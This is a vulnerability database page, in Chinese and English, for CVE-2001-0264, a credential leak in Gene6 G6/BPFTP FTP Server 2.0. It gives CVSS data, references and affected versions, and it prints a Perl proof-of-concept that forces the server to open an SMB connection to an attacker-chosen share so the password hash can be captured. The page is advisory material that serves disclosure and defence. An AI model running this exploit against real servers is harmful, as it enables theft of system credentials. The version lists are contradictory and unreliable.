CVE-2001-0264
CVSS5.0
发布时间 :2001-06-18 00:00:00
修订时间 :2008-09-05 16:23:41
NMCOES    

[原文]Gene6 G6 FTP Server 2.0 (aka BPFTP Server 2.10) allows remote attackers to obtain NETBIOS credentials by requesting information on a file that is in a network share, which causes the server to send the credentials to the host that owns the share, and allows the attacker to sniff the connection.


[CNNVD]Gene6 BPFTP FTP服务器用户证明泄漏漏洞(CNNVD-200106-103)

        Gene6 G6 FTP Server 2.0版本 (也称为 BPFTP Server 2.10版本)存在漏洞。远程攻击者可以通过网络共享文件的请求信息获得NETBIOS证明。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0264
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0264
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-103
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2534
(VENDOR_ADVISORY)  BID  2534
http://www.atstake.com/research/advisories/2001/a040301-1.txt
(VENDOR_ADVISORY)  ATSTAKE  A040301-1

- 漏洞信息

Gene6 BPFTP FTP服务器用户证明泄漏漏洞
中危 环境条件错误
2001-06-18 00:00:00 2005-10-20 00:00:00
远程  
        Gene6 G6 FTP Server 2.0版本 (也称为 BPFTP Server 2.10版本)存在漏洞。远程攻击者可以通过网络共享文件的请求信息获得NETBIOS证明。

- 公告与补丁

        Gene6 has addressed this issue in BPFTP Server v2.10:
        Gene6 G6 FTP Server 2.0
        

- 漏洞信息 (20723)

Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure Vulnerability (EDBID:20723)
windows remote
2001-04-03 Verified
0 Rob Beck
N/A [点击下载]
source: http://www.securityfocus.com/bid/2534/info

G6 FTP Server now known as BPFTP Server is an internet FTP server by Gene6

If a logged in FTP user connects to an external share and submits a malformed 'size' or 'mdtm' command, the user could force the FTP server to make an external SMB connection.

The FTP server must provide login credentials of the user the server is running under in order to make a connection to the remote host. A password hash is sent across the external connection to the host. A third party network utility could be listening for internal and external traffic and capture the password hash. The captured hash could be resolved into the username and password.

#!/usr/bin/perl
# G6-2nbt.pl - example G6 ftp server netbios connection script
#
# Tested on win32 and Linux, Linux requires share name to be in
# the format: \\\\host\\share\\path or //host/share/path

use Getopt::Std;
use IO::Socket;

my($host,$login,$pass,$share,$CRLF,$result);

$CRLF = "\015\012";
getopts('h:l:p:s:',\%args);

if (!defined $args{h}){ print "No host specified.\n";exit;}else{$host =
$args{h};}
if (!defined $args{s}){ print "No share specified.\n";exit;}else{$share =
$args{s};}
if (!defined $args{l} || !defined $args{p}){($login,$pass) =
('anonymous','user@myhost.com');}
else { ($login,$pass) = ($args{l},$args{p});}

$our_sock =
IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>21)||
die("Socket problems.");

print "Connected!\n";
print "Login...";

print $our_sock "USER $login" . $CRLF;
$result = <$our_sock>;
if ($result !~ /331\s/) { print "User name not accepted or an error
occurred...exiting.\n";close($our_sock);exit; }

print "good.\nPass....";

print $our_sock "PASS $pass" . $CRLF;
$result = <$our_sock>;
if ($result !~ /230\s/) { if ($result =~ /530\s/) { print "Login/password
incorrect exiting.\n";close($our_sock);exit; } else { print "Login
failure..exiting.\n";close($our_sock);exit; }}

print "good.\nTesting path type...";

print $our_sock "PWD" . $CRLF;
$result = <$our_sock>;
$result = <$our_sock>;
if (lc($result) !~ /\/[a-z][:]\//) { print "Looks like 'show relative
path' is enabled...exiting.\n";close($our_sock);exit;}

print "not relative path.\nSending UNC to connect to...";

print $our_sock "SIZE $share" . $CRLF;
print "completed.\nCheck your logs.\n";

close($our_sock);
exit;
		

- 漏洞信息

13856
Gene6 G6 FTP Server File Request NETBIOS Credential Exposure
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

- 时间线

2001-04-03 Unknow
2001-04-03 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Gene6 BPFTP FTP Server User Credentials Disclosure Vulnerability
Environment Error 2534
Yes No
2001-04-03 12:00:00 2009-07-11 06:06:00
Discovered by Rob Beck [rbeck@atstake.com] on April 3, 2001.

- 受影响的程序版本

Gene6 G6 FTP Server 2.0
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
Gene6 BPFTP Server 2.10
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0

- 不受影响的程序版本

Gene6 BPFTP Server 2.10
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0

- 漏洞讨论

G6 FTP Server now known as BPFTP Server is an internet FTP server by Gene6

If a logged in FTP user connects to an external share and submits a malformed 'size' or 'mdtm' command, the user could force the FTP server to make an external SMB connection.

The FTP server must provide login credentials of the user the server is running under in order to make a connection to the remote host. A password hash is sent across the external connection to the host. A third party network utility could be listening for internal and external traffic and capture the password hash. The captured hash could be resolved into the username and password.

- 漏洞利用

The following exploit has been provided by Rob Beck [rbeck@atstake.com] from @stake:

- 解决方案

Gene6 has addressed this issue in BPFTP Server v2.10:


Gene6 G6 FTP Server 2.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站